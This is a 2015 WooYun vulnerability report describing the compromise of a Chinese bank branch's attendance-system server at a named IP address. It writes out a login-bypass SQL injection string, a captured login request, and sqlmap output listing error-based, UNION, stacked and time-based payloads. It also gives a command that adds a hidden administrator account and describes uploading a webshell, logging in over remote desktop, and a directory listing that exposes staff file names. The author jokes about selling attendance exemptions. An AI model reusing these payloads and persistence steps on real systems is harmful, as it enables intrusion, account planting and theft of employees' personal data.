当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0139606

漏洞标题:中国邮政储蓄银行某站点SQl注入导致getshell(数十个单位上千员工信息泄露&已登录远程桌面)

相关厂商:中国邮政储蓄银行

漏洞作者: 默之

提交时间:2015-09-07 23:27

修复时间:2015-09-12 23:28

公开时间:2015-09-12 23:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-07: 细节已通知厂商并且等待厂商处理中
2015-09-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

SQL注入~是由一个软件造成的

详细说明:

先介绍一下这款考勤软件,永益web考勤管理系统,目前市场份额挺小的,不过还是有个别用户使用,这个系统存在通用的登陆框处注入漏洞(因为没有找到更多的例子,所以就不能提交了)
网址:http://59.46.94.68/ 中国邮政储蓄银行股份有限公司沈阳分公司

页面.png


#1 SQL注入
(1)在txtusername处存在注入
账号admin'or'1'='1 密码:任意6位拼写

登陆界面.png


找到人员管理,包含数十个单位的上千名员工信息,还有员工的工号。PS:领导就是好,还是免签组的人,你们分行谁想免签,我可以帮一下~

人员信息.png


人数.png


(2)配合sqlmap的--os-shell,顺利拿下远程访问
登陆的时候抓包如下

POST /Login.aspx?ReturnUrl=%2fLogout.aspx HTTP/1.1
Host: 59.46.94.68
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-MicrosoftAjax: Delta=true
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Referer: http://59.46.94.68/Login.aspx?ReturnUrl=%2fLogout.aspx
Content-Length: 380
Cookie: kaoqinv3=ACC9FB1D7A5E580C1CFF5EE6BA21ECF1E61AAA8C8C74A7C2F86DDDA0C94B93AAA2153160D9465E564FB744167D6CD68612936BB588CBEC6ED58773AA4A2B536EA85989F822D80BA99C3A219CD1B422F3AB2C5BA644FB5CE784A24CD006AE45A0498843190371C88D80075B83111E1E35B56BFCB4
Connection: keep-alive
Pragma: no-cache
ScriptManager1=UpdatePanel1%7CibtLogin&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTU4NDM0NjE3MmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFCGlidExvZ2luLn8eh5CQyvecM2BwkDNNnGPM%2B8k%3D&__EVENTVALIDATION=%2FwEWBAKo%2F4yuDQKl1bKzCQK1qbSRCwKr8tnHBlWbJX1knDRzqPvDAtsW69fz%2Fei6&txtUserName=admin*&txtPassword=admin&__ASYNCPOST=true&ibtLogin.x=42&ibtLogin.y=18


丢到sqlmap跑出来的数据

sqlmap identified the following injection points with a total of 258 HTTP(s) req
uests:
---
Place: (custom) POST
Parameter: #1*
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: ScriptManager1=UpdatePanel1|ibtLogin&__EVENTTARGET=&__EVENTARGUMENT
=&__VIEWSTATE=/wEPDwUKMTU4NDM0NjE3MmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV
9fFgEFCGlidExvZ2luLn8eh5CQyvecM2BwkDNNnGPM+8k%3D&__EVENTVALIDATION=/wEWBAKo/4yuD
QKl1bKzCQK1qbSRCwKr8tnHBlWbJX1knDRzqPvDAtsW69fz/ei6&txtUserName=admin' AND 1059=
CONVERT(INT,(CHAR(58)+CHAR(117)+CHAR(113)+CHAR(100)+CHAR(58)+(SELECT (CASE WHEN
(1059=1059) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(122)+CHAR(112)+CHAR(
98)+CHAR(58))) AND 'WFpz'='WFpz&txtPassword=admin&__ASYNCPOST=true&ibtLogin.x=42
&ibtLogin.y=18
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: ScriptManager1=UpdatePanel1|ibtLogin&__EVENTTARGET=&__EVENTARGUMENT
=&__VIEWSTATE=/wEPDwUKMTU4NDM0NjE3MmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV
9fFgEFCGlidExvZ2luLn8eh5CQyvecM2BwkDNNnGPM+8k%3D&__EVENTVALIDATION=/wEWBAKo/4yuD
QKl1bKzCQK1qbSRCwKr8tnHBlWbJX1knDRzqPvDAtsW69fz/ei6&txtUserName=-2201' UNION ALL
 SELECT CHAR(58)+CHAR(117)+CHAR(113)+CHAR(100)+CHAR(58)+CHAR(106)+CHAR(65)+CHAR(
108)+CHAR(99)+CHAR(68)+CHAR(85)+CHAR(108)+CHAR(66)+CHAR(88)+CHAR(98)+CHAR(58)+CH
AR(122)+CHAR(112)+CHAR(98)+CHAR(58)-- &txtPassword=admin&__ASYNCPOST=true&ibtLog
in.x=42&ibtLogin.y=18
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: ScriptManager1=UpdatePanel1|ibtLogin&__EVENTTARGET=&__EVENTARGUMENT
=&__VIEWSTATE=/wEPDwUKMTU4NDM0NjE3MmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV
9fFgEFCGlidExvZ2luLn8eh5CQyvecM2BwkDNNnGPM+8k%3D&__EVENTVALIDATION=/wEWBAKo/4yuD
QKl1bKzCQK1qbSRCwKr8tnHBlWbJX1knDRzqPvDAtsW69fz/ei6&txtUserName=admin'; WAITFOR
DELAY '0:0:5'--&txtPassword=admin&__ASYNCPOST=true&ibtLogin.x=42&ibtLogin.y=18
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: ScriptManager1=UpdatePanel1|ibtLogin&__EVENTTARGET=&__EVENTARGUMENT
=&__VIEWSTATE=/wEPDwUKMTU4NDM0NjE3MmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV
9fFgEFCGlidExvZ2luLn8eh5CQyvecM2BwkDNNnGPM+8k%3D&__EVENTVALIDATION=/wEWBAKo/4yuD
QKl1bKzCQK1qbSRCwKr8tnHBlWbJX1knDRzqPvDAtsW69fz/ei6&txtUserName=admin' WAITFOR D
ELAY '0:0:5'--&txtPassword=admin&__ASYNCPOST=true&ibtLogin.x=42&ibtLogin.y=18
---
[20:20:15] [INFO] testing MySQL
[20:20:20] [WARNING] the back-end DBMS is not MySQL
[20:20:20] [INFO] testing Oracle
[20:20:24] [WARNING] the back-end DBMS is not Oracle
[20:20:24] [INFO] testing PostgreSQL
[20:20:28] [WARNING] the back-end DBMS is not PostgreSQL
[20:20:28] [INFO] testing Microsoft SQL Server
[20:20:32] [INFO] confirming Microsoft SQL Server
[20:20:44] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[20:20:44] [INFO] fetched data logged to text files under 'C:\Python27\sqlmappro
ject-sqlmap-b5060c0\output\59.46.94.68'


下面使用sqlmap的--os-shell添加用户,刚开始使用net user命令,竟然没有返回数据,那就试试

net user temp temp /add & net localgroup administrators temp /add


依然返回数据为空,不过没关系,命令已经执行了登陆之

添加用户.png


远程桌面.png


ip.png


这个服务器主要就是一个打卡考勤的服务器,没有别的网站在上面,翻看了一下,找到了一个给内部ic卡充值的软件,密码也有,这要是让内部员工得到之后,天天就不愁吃了

充值.png

漏洞证明:

#2 Getshell
登录系统之后找到请假管理,里面有一个上传的页面,直接抓包,修改后缀,发包,就可以得到shell

上传.png


shell.png


一些敏感信息泄露
在一个配置文件里找到了这个,hash值,但是我没有破解成功

<publisherIdentity name="CN=CZP-T420\Administrator" issuerKeyHash="3b66588d735daf22d864c47625964970ecc9047a" /><Signature Id="StrongNameSignature" xmlns="http://www.w3.org/2000/09/xmldsig#"><SignedInfo><CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#" /><SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1" /><Reference URI=""><Transforms><Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature" /><Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#" /></Transforms><DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"


当然也连上了数据库

数据库.png


#3 目录遍历

59.46.94.68 - /data/ImportExcel/Employee/
[To Parent Directory]
             2015年5月30日    19:08         9955 1.xlsx
             2014年9月29日    10:02        13824 10月2.xls
             2014年9月30日    10:36        17408 10月一支导入排班1.xlsx.xls
             2014年9月30日    16:36        11776 10月于洪广场支行导入排班.xlsx.xlsx
            2014年10月17日     8:21        17408 10月于洪支行导入排班1.xlsx.xls
             2014年9月30日    13:31        19456 10月于洪沙岭支行导入排班1.xlsx.xls
            2014年10月31日    17:49        19398 10月导入排班.xlsx
             2014年9月29日    10:00        16896 10月班表.xls
             2014年9月29日     9:31        15360 10月班表.xlsx
             2014年9月30日    16:31        26624 10月黄海路支行导入排班.xlsx.xlsx
             2014年9月29日    11:37        12800 111.xls
             2014年9月30日    10:33        11264 111110月一支导入排班1.xlsx.xls
            2014年10月31日    17:22        11776 11月于洪广场导入排班1.xlsx.xls
            2014年10月31日     9:53        11264 11月于洪支行导入排班1.xlsx - 副本.xls
             2015年3月31日    20:27        19456 11月于洪沙岭支行导入排班1.xlsx.xls
            2014年10月31日    22:13        11232 11月导入排班.xlsx
            2014年10月22日    11:57        12800 11月导入班表.xls
            2014年10月29日    14:00        17920 11月班表.xls
            2014年10月31日    10:41        21504 11月黄海路支行导入排班.xlsx.xlsx
             2014年12月1日     7:53        16896 12.xls
             2014年12月2日     9:52        35840 12月.xls
             2015年6月30日    14:36        13312 12月于洪广场导入排班1.xlsx.xls
            2014年11月28日    15:07        11264 12月于洪支行导入排班1.xlsx.xls
             2014年12月3日    15:55        19538 12月导入排班.xlsx
            2014年11月29日    15:55        17920 12月班表.xls
            2014年11月29日    23:38        20992 12月黄海路支行导入排班.xlsx.xlsx
              2015年1月7日     9:21        13312 15.1月班表.xls
             2015年1月29日    16:31        13824 15.2月班表.xls
              2015年3月2日     8:31        14336 15.3月班表.xls
              2015年4月2日     8:31        17920 15.4月班表.xls
             2015年4月30日     7:53        18432 15.5月班表.xls
             2015年5月29日     8:39        13824 15.6月班表.xls
             2015年6月30日    14:01        14336 15.7月班表.xls
             2015年8月28日    11:25        14336 15.9月班表.xls
              2015年1月1日    12:49        19524 1月导入排班.xlsx
            2014年11月11日    12:57        11776 201411.xls
            2014年11月26日     9:14        12288 20141101.et
             2014年11月1日     8:39         9344 201411月份 网点导入排班 .xlsx
             2014年12月6日    13:45        12800 201412.xls
             2014年12月6日    14:25        13312 2014121.et
            2014年11月30日    11:22         9398 201412月份 网点导入排班.xlsx
              2015年1月6日    12:40        10240 2015-1月导入排班.xls
              2015年2月5日    13:32        10240 2015-2月导入排班.xls
              2015年3月4日     8:26        10240 2015-3月导入排班.xls
              2015年4月8日    15:26        10240 2015-4月导入排班.xls
              2015年5月7日    15:19        10240 2015-5月导入排班.xls
             2015年6月11日     8:44        10240 2015-6月导入排班.xls
              2015年7月9日    14:18        10240 2015-7月导入排班.xls
             2015年8月10日     8:07        10240 2015-8月导入排班.xls
            2014年12月31日    11:30        14276 2015.1.xlsx
              2015年1月6日    12:08        12800 201501.xls
            2014年12月31日     9:21         9428 201501月份 网点导入排班.xlsx
              2015年2月6日    14:37        13824 201502.xls
             2015年1月30日    12:33        11099 201502月份 网点导入排班.xlsx
             2015年1月31日    19:15        11062 201502月导入排班.xlsx
             2015年3月31日    15:51        16896 201503.xls
             2015年2月26日     8:41        11235 201503月份 网点导入排班.xlsx
             2015年2月28日    18:28        11233 201503月导入排班.xlsx
             2015年4月14日     9:51        17408 201504.xls
             2015年4月26日    13:38        12027 201504月份 网点导入排班.xlsx
              2015年5月6日    13:51        13312 201505.xls
             2015年5月10日    13:06        12062 201505月份 网点导入排班.xlsx
              2015年6月9日    10:04        13824 201506.xls
             2015年5月31日    10:19        12034 201506月份 网点导入排班.xlsx
              2015年7月4日    14:10        13824 201507.xls
              2015年7月1日     9:29        11914 201507月份 网点导入排班.xlsx
              2015年8月4日    13:12        14336 201508.xls
             2015年7月31日    10:59        12102 201508月份 网点导入排班.xlsx
              2015年9月3日    14:45        14336 201509.xls
             2015年8月30日     9:13        12138 201509月份 网点导入排班.xlsx
            2014年12月25日    18:43        26112 2015年1月份排班.xls
            2014年12月31日    20:59        17408 2015年1月导入排班.xls
            2014年12月31日    16:56        11264 2015年1月月于洪支行导入排班1.xlsx - 副本.xls
              2015年2月2日    10:01        25088 2015年2月.xls
             2015年1月30日    13:35        11264 2015年2月月于洪支行导入排班1.xlsx - 副本 - 副本.xls
             2015年2月28日    14:22        27648 2015年3月.xls
             2015年2月28日    10:55        11264 2015年3月于洪支行导入排班1.xlsx - 副本 - 副本 - 副本.xls
             2015年2月25日    10:58        26624 2015年3月份排班.xls
             2015年4月29日    14:24        27136 2015年4月.xls
             2015年3月31日    16:10        11264 2015年4月于洪支行导入排班1.xlsx -.xls
              2015年4月2日    17:47        26624 2015年4月份排班.xls
             2015年4月29日    14:36        26624 2015年5月.xls
             2015年4月30日    10:42        10752 2015年5月于洪支行导入排班1.xlsx - - 副本.xls
             2015年4月21日    16:46        27136 2015年5月份排班.xls
              2015年6月1日    16:54        27648 2015年6月.xls
             2015年5月29日     8:46        10752 2015年6月于洪支行导入排班1.xlsx - - 副本 - 副本.xls
             2015年5月26日    16:31        26624 2015年6月份排班.xls
             2015年7月13日    12:09        28160 2015年7月.xls
             2015年6月30日    13:43        10752 2015年7月于洪支行导入排班1.xlsx - - 副本 - 副本 - 副本.xls
             2015年6月27日    11:06        26624 2015年7月份排班.xls
             2015年7月30日    14:17        27648 2015年8月.xls
              2015年8月3日     8:42        10752 2015年8月于洪支行导入排班1.xlsx.xls
             2015年7月28日    16:48        26624 2015年8月份排班.xls
              2015年9月1日    13:24        27648 2015年9月.xls
              2015年9月1日     9:28        10752 2015年9月于洪支行导入排班1.xlsx.xls
             2015年8月29日    14:42        27648 2015年9月份排班.xls
              2015年2月3日    14:44        17424 2月导入排班.xlsx
              2015年3月3日    16:21        18269 3月导入排班.xlsx
             2015年4月27日     8:49        18179 4月导入排班.xlsx
             2015年4月30日    19:57        14848 5.01.xls
             2015年4月30日    17:59        19472 5月导入排班.xlsx
             2015年7月30日    14:55        21829 8月导入排班.xlsx
              2015年9月1日    13:52        31744 8月指纹班表.xls
             2014年9月28日    15:30        14848 Book1.xls
             2014年10月8日     9:48        13312 sheet1.xls
             2015年4月26日    21:01       505856 于洪支行人员导入模板V3.0-201303.xls
             2014年3月27日    19:34        15455 人员信息.xls
              2013年5月9日    15:22       188928 人员导入模板.xls
             2014年7月30日    11:17        83456 人员导入模板V3.0-201303.xls
              2014年9月2日    11:22        11264 人员汇总(1).xls
              2014年9月2日    10:17       563200 人员汇总.xls
            2014年10月31日    14:11        13312 仙岛北路导入排班(11).xls
            2014年11月29日    14:10        13312 仙岛北路导入排班(12).xls
              2015年1月1日    11:32        13312 仙岛北路导入排班(1月).xls
             2015年1月31日    13:57        19968 仙岛北路导入排班(2月).xls
              2015年3月9日    10:35        13824 仙岛北路导入排班(3月) - 副本.xls
             2015年2月25日    14:21        19968 仙岛北路导入排班(3月).xls
             2015年3月31日    15:34        19456 仙岛北路导入排班(4月).xls
             2015年4月30日    19:24        18432 仙岛北路导入排班(5月).xls
             2015年5月30日    13:19        18944 仙岛北路导入排班(6月) -.xls
             2015年6月30日    18:00        18944 仙岛北路导入排班(7月).xls
             2015年7月30日    14:39        18432 仙岛北路导入排班(8月).xls
             2015年8月28日    15:59        17920 仙岛北路导入排班(9月).xls
            2014年10月29日    13:57        10240 仙岛北路导入排班1.xls
              2015年1月5日    14:46        12800 侯帅.xls
              2015年1月5日    14:46        11776 刘昊辰排版导入表1.xls
             2014年9月30日    14:25        20480 北站支行10月份班表.xls
            2014年10月31日    13:38        20480 北站支行11月份班表.xls
            2014年11月28日    17:32        24064 北站支行12月份班表.xls
            2014年10月31日    11:00        31232 县行机关导入排班1.xls
            2014年12月31日     9:54        32256 县行机关导入排班11月.xls
              2015年2月1日    11:43        27648 县行机关导入排班2015.2月.xls
            2014年10月16日     9:56        12800 吉祥支行10月份班表.xls
            2014年11月19日    13:55        13824 吉祥支行11月份班表.xls
            2014年12月31日     9:07        13824 吉祥支行12月份班表.xls
             2015年1月29日    13:25        14336 吉祥支行1月份班表.xls
             2015年2月21日    16:29        13824 吉祥支行2月份班表.xls
              2015年3月8日    16:30        14336 吉祥支行3月份班表.xls
              2015年4月3日    12:04        13824 吉祥支行4月份班表.xls
             2013年11月3日    17:24        10801 员工排班表.xls
            2014年10月19日     8:53         9234 城北10月份 网点导入排班.xlsx
            2014年12月31日     9:18         9428 城北1月份 网点导入排班.xlsx
             2014年9月30日    14:05        11264 城北网点导入排班.xls
             2014年12月3日    15:52        18158 复件 11月导入排班.xlsx
            2014年10月31日    10:46        21504 复件 11月黄海路支行导入排班.xlsx.xlsx
             2015年3月30日    15:56        13824 复件 15.4月班表.xls
              2015年8月4日    15:33        14336 复件 15.8月班表.xls
             2015年2月24日     9:49        26112 复件 2015年2月份排班.xls
              2015年6月4日    14:21        21676 复件 5月导入排班.xlsx
              2015年7月4日    11:02        21837 复件 6月导入排班.xlsx
             2014年12月1日    14:51        12288 复件 县行机关导入排班11月.xls
              2015年3月1日    21:17        30720 复件 县行机关导入排班2015.3月.xls
             2015年3月31日    16:47        32256 复件 复件 县行机关导入排班20154月.xls
             2015年4月30日     8:48        30720 复件 复件 复件 县行机关导入排班20155月.xls
            2014年10月29日    15:29         9053 复件 导入排班1.xlsx
             2015年1月31日    14:40        14336 复件 导入排班10.xls
             2015年2月27日    14:47        17920 复件 导入排班3.xlsx(青年支行)03.xls
              2015年6月1日     6:59        30720 复件 康平县行机关导入排班20156月.xls
             2015年3月20日    16:18        14336 复件 长白支行班表.xls
              2015年4月2日     9:30        32256 太原 导入排班太原支行3月(1).xls
              2015年5月6日    17:05        31232 太原 导入排班太原支行4月(1).xls
              2015年6月2日    15:36        30720 太原 导入排班太原支行5月(1).xls
              2015年6月3日    14:08        35840 太原 导入排班太原支行5月(11).xls
            2014年10月16日    15:04        10752 太原支行.xls
             2014年9月30日    14:38        14848 导入排班-营业部.xls
              2015年9月2日     8:56        30208 导入排班.xls
              2015年2月3日    14:20         9821 导入排班.xlsx
             2014年9月30日    14:25        10752 导入排班.xlsx.xls
              2015年4月1日    16:11        16896 导入排班02.xlsx
              2015年5月5日     9:11        16896 导入排班04.et
             2015年6月12日    10:49        15360 导入排班05.et
              2015年7月4日    15:38        16384 导入排班07.et
              2015年8月6日    10:39        15872 导入排班08.et
              2015年9月2日    17:18        15872 导入排班09.et
             2015年8月30日    14:42        11776 导入排班1 - 副本.xls
              2015年2月4日    13:18        15360 导入排班1.1.xls
             2014年9月28日    18:21         4793 导入排班1.txt
              2015年9月1日     8:05        29696 导入排班1.xls
             2015年6月29日    15:25        12248 导入排班1.xlsx
            2014年12月31日    16:42        15360 导入排班1.xlsx.et
            2014年10月21日    13:41        12288 导入排班10.13.xls
             2015年1月24日     9:58        10752 导入排班10.xls
            2014年10月14日     9:13        13317 导入排班10.xlsx
            2014年10月29日    10:22        11776 导入排班10月 - 张晓彤.xls
            2014年10月30日    16:02        12288 导入排班10月.xls
            2014年10月10日    10:52        11177 导入排班10月.xlsx
             2015年1月29日    10:49        15360 导入排班11(1).xlsx
             2015年1月12日    11:02        14848 导入排班11.xls
             2015年2月26日     9:46        14848 导入排班11.xlsx
            2014年11月19日     9:44        12288 导入排班11月 .xls
             2014年11月1日     6:36        11483 导入排班11月.xlsx
            2014年10月31日    14:01         9310 导入排班11月1.xlsx
            2014年11月28日    15:00        27648 导入排班12.xls
            2014年11月28日    15:03        14172 导入排班12.xlsx
            2014年11月19日     9:45        11776 导入排班12月.xls
             2014年12月1日     6:36        11465 导入排班12月.xlsx
             2014年9月30日    15:56        10752 导入排班1新.xls
            2014年12月31日     8:55        12288 导入排班1月.xls
              2015年1月4日     9:03        12640 导入排班1月.xlsx
            2014年10月31日    13:47        17408 导入排班2.xls
             2014年9月30日    20:41        10491 导入排班2.xlsx
             2015年2月23日    14:24        11392 导入排班201501.xlsx
             2015年3月29日    12:42        11354 导入排班201503.xlsx
             2015年4月28日    15:39        11509 导入排班201504.xlsx
             2015年4月28日    15:40        11509 导入排班201505.xlsx
             2015年5月30日     9:24        11497 导入排班201506.xlsx
             2015年1月30日     9:35        12288 导入排班2月.xls
            2014年10月15日    20:10        10739 导入排班3.xlsx
             2014年10月8日    14:15        14336 导入排班3.xlsx(青年支行).xls
            2014年12月29日    19:28        16896 导入排班3.xlsx(青年支行)01.xls
             2015年1月27日    16:04        16384 导入排班3.xlsx(青年支行)02.xls
            2014年10月31日    19:30        18944 导入排班3.xlsx(青年支行)11.xls
            2014年11月29日    18:28        18944 导入排班3.xlsx(青年支行)12.xls
             2015年2月27日     9:56        12288 导入排班3月.xls
             2015年3月31日     8:23        12288 导入排班4月.xls
             2015年3月31日    14:13        16896 导入排班4月.xlsx(青年支行)02.xls
             2015年4月29日    12:42        17920 导入排班4月.xlsx(青年支行)05.xls
              2015年5月5日    16:18        12288 导入排班5月.xls
              2015年6月1日    14:23        12288 导入排班6月.xls
             2015年5月28日     9:45        17920 导入排班6月.xlsx(青年支行).xls
             2015年6月25日    13:41        11479 导入排班7.xlsx
             2015年7月27日     9:25        12288 导入排班7月.xls
              2015年7月3日    10:12        18432 导入排班7月.xlsx(青年支行).xls
              2015年8月4日    17:07        18432 导入排班8.xls
              2015年9月1日    15:00        16896 导入排班8月.xls
             2015年7月29日    12:46        18432 导入排班8月.xlsx(青年支行).xls
             2015年8月30日    14:14        11610 导入排班9.xlsx
             2015年8月31日    15:26        12800 导入排班9月.xls
             2015年8月29日    15:50        17408 导入排班9月.xlsx(青年支行).xls
              2015年5月1日    13:59        16896 导入排班一月.xls
             2015年7月29日     9:35        16896 导入排班七月.xls
              2015年9月2日     9:32        67584 导入排班上传版(最新).xls
              2015年2月6日     8:31        34304 导入排班上传版.xls
            2014年10月31日    13:58        22528 导入排班北站支行.xls
            2014年10月31日    13:53        22528 导入排班北站支行.xlsx
            2014年10月31日    13:48        22528 导入排班北站支行.xlsx.xls
            2014年10月31日    13:57        17408 导入排班十一月.xls
             2014年12月1日    14:08        17920 导入排班十二月.xls
              2015年7月3日    15:39        16896 导入排班十月.xls
            2014年10月18日    15:57        10845 导入排班向工.xlsx
            2014年11月16日    16:52        11061 导入排班向工11月.xlsx
            2014年12月11日    10:35        11365 导入排班向工12月.xlsx
              2015年1月1日    11:05        11058 导入排班向工2015年1月.xlsx
              2015年2月1日    18:26        10987 导入排班向工2015年2月.xlsx
              2015年3月7日    12:04        11164 导入排班向工2015年3月.xlsx
              2015年4月3日    10:55        11125 导入排班向工2015年4月.xlsx
            2014年12月18日    15:24        22016 导入排班太原支行.xls
              2015年2月9日     8:46        23552 导入排班太原支行1月.xls
              2015年3月4日     8:37        33792 导入排班太原支行2月(1).xls
              2015年3月4日     8:45        33792 导入排班太原支行2月(11).xls
              2015年3月4日     9:04        33792 导入排班太原支行2月(订).xls
              2015年2月3日     8:22        32768 导入排班终级版.xls
              2015年1月7日    13:28        62976 导入排班终级版1501.xls
              2015年2月3日     8:13        97280 导入排班终级版2015.xls
             2014年9月28日    16:34         8628 导入排班齐贤班表.xlsx
             2014年12月5日    15:09        12288 导入排班齐贤班表12月份.xls
            2014年11月30日    13:07         9602 导入排班齐贤班表12月份.xlsx
              2015年3月8日    13:21         9905 导入排班齐贤班表1月份.xlsx
             2015年3月29日    13:24         9962 导入排班齐贤班表4月份.xlsx
              2015年5月3日    10:52        10007 导入排班齐贤班表5月份.xlsx
              2015年6月4日    17:01         9949 导入排班齐贤班表6月份.xlsx
              2015年7月1日    17:30         9947 导入排班齐贤班表7月份.xlsx
             2015年7月15日    13:29         9978 导入排班齐贤班表8月份.xlsx
             2015年2月13日    17:22        10649 导入排班(2月份).xlsx
             2015年3月19日    14:19        11307 导入排班(3月份).xlsx
              2015年5月7日    13:59        11797 导入排班(4月份).xlsx
              2015年6月4日    15:43        17408 导入排班(5月份).xls
             2015年5月17日    17:51        12225 导入排班(5月份).xlsx
              2015年7月2日    11:09        18944 导入排班(6月份).xls
              2015年8月3日     9:10        18432 导入排班(7月份).xls
              2015年9月6日    12:24        18432 导入排班(8月份).xls
              2015年9月6日    12:25        17920 导入排班(9月份).xls
             2014年9月30日    15:22         9728 小北一路支行2014年10月1-12日排班表.xls
              2015年8月6日    10:59        25088 工作簿2.xls
              2015年7月1日    13:58        28672 康平县行机关导入排班20157月.xls
              2015年8月3日     8:11        27136 康平县行机关导入排班20158月.xls
              2015年9月2日     8:25        27648 康平县行机关导入排班20159月.xls
             2014年9月30日    16:29        12800 康平城南10月导入排班.xls
            2014年11月29日     9:42        13824 康平城南11月导入排班.xls
            2014年11月30日    14:32        13312 康平城南12月导入排班.xls
             2015年7月30日    16:53        13824 康平城南1月导入排班.xls
             2015年1月31日    21:53        22528 康平城南2月导入排班.xls
              2015年3月1日    20:02        22528 康平城南3月导入排班.xls
             2015年3月31日    19:12        16384 康平城南4月导入排班.xls
              2015年5月5日    10:22        15872 康平直属导入排班.xls
            2014年11月29日    11:22        10836 康平直属导入排班.xlsx
            2014年12月30日    16:48        15360 康平直属导入排班12.xls
              2014年9月2日    13:30        11264 总.xls
              2015年8月6日    10:53        31232 指纹班表.xls
              2015年9月6日    10:49        12800 排班.xls
             2015年2月28日    10:54        11076 排班.xlsx
            2014年10月31日     9:54        16384 排班11月.xls
             2015年2月12日    17:52        14336 排班2月份.et
             2015年3月20日    14:12        15360 排班3月份.et
              2015年4月4日     8:00        15872 排班4月份.et
             2015年4月29日    17:33        15872 排班5月份.et
             2015年5月29日    15:37        16384 排班6月份.et
              2015年7月1日     9:38        16896 排班7月份.et
             2015年7月29日    10:57        16384 排班8月份.et
             2015年8月25日    15:30        15872 排班9月份.et
             2014年8月29日    15:20       638976 支行部分.xls
              2014年9月2日     9:12       165376 支行部分2.xls
            2014年10月17日    13:19        12288 文官排版导入表.xls
             2014年12月1日     9:19        10752 文官排版导入表1.xls
            2014年11月25日     8:59        10752 文官排版导入表11调.xls
            2014年10月13日    15:05         9016 文萃支行导入排班.xlsx
            2014年10月19日    13:25        10122 文萃支行导入排班10月份.xlsx
             2015年1月23日    13:46        10458 文萃模板导入排班2015年1月份班表.xlsx
            2014年11月30日    17:41        11360 新12月导入排班.xlsx
             2015年3月31日    20:44        11533 新201504导入排班.xlsx
              2015年1月6日    13:06        17920 新城子营业部排班导入表.xls
            2014年12月31日    11:44        27136 新建 Microsoft Excel 工作表.xls
            2014年11月24日    14:23         9216 新建 Microsoft Word 文档.doc
            2014年12月31日     9:06        25600 新民支行导入排班1.xls
              2015年9月2日    10:59        25600 新民支行导入排班1201501.xls
              2015年4月1日    18:06        26112 新民支行导入排班1201504.xls
             2014年10月9日    16:03        11571 昆西导入排班10月.xlsx
            2014年10月31日    18:56        11861 昆西导入排班11月.xlsx
             2014年12月2日    15:49        12158 昆西导入排班12月.xlsx
              2015年1月2日    11:11        11841 昆西导入排班1月(2015).xlsx
              2015年2月6日    14:54        11728 昆西导入排班2月(2015).xlsx
              2015年4月3日    11:26        11648 昆西导入排班3月(2015).xlsx
             2015年3月30日    16:05        11456 昆西导入排班4月(2015).xlsx
             2015年4月30日    14:17        10856 昆西导入排班4月(宛龄).xlsx
             2015年4月29日    15:19        11656 昆西导入排班5月(2015).xlsx
             2015年6月20日    13:42        10302 昆西导入排班6月(2015).xlsx
             2015年7月18日    16:40        10484 昆西导入排班7月(2015).xlsx
             2015年8月12日    12:24        11667 昆西导入排班8月(2015).xlsx
              2015年9月7日    14:20        11759 昆西导入排班9月(2015).xlsx
            2014年10月31日    14:23         8573 模板导入排班.xlsx
            2014年10月31日    18:43        10065 模板导入排班11月份.xlsx
            2014年12月29日     9:32        10035 模板导入排班12月份.xlsx
             2014年12月1日    10:21        12800 民族导入排班1.xls
              2014年9月2日    11:13        10183 汇总.xlsx
            2014年10月14日    13:31        14336 沈辽考勤排班.xls
              2015年6月3日    15:27      1757157 沈阳邮政储蓄银行考勤员使用说明文档.docx
            2014年12月29日    20:59         9497 班表1月.xlsx
             2014年10月8日    14:55        13312 白塔支行.xls
             2014年10月8日     9:41        13312 白塔支行10月份排班表.xls
             2014年10月8日    12:46        14848 直属导入排班1.xls
             2015年8月31日    17:02        13824 直属排班表.et
             2014年11月7日    16:06         9414 网点导入排班.xlsx
             2015年8月28日    13:23        16896 考勤导入表.xls
            2014年10月31日    12:23        15360 考勤表.xls
             2014年10月8日    10:39        15360 苏家屯支行排班表.xls
              2015年9月2日    15:33        13312 苏家屯支行班表.xls
              2015年9月4日    16:21        15872 苏家屯直属排班表.xls
             2014年9月30日    14:46        10786 营业部10月份导入排班.xlsx
            2014年11月27日    11:02        10753 营业部11月份导入排班.xlsx
            2014年11月27日    11:03        10857 营业部12月份导入排班.xlsx
            2014年12月31日    13:46        10889 营业部1月份导入排班.xlsx
             2015年2月13日    13:56        11257 营业部2月份导入排班.xlsx
              2015年3月2日     9:50        11194 营业部3月份导入排班.xlsx
             2015年4月15日    14:59        11326 营业部4月份导入排班.xlsx
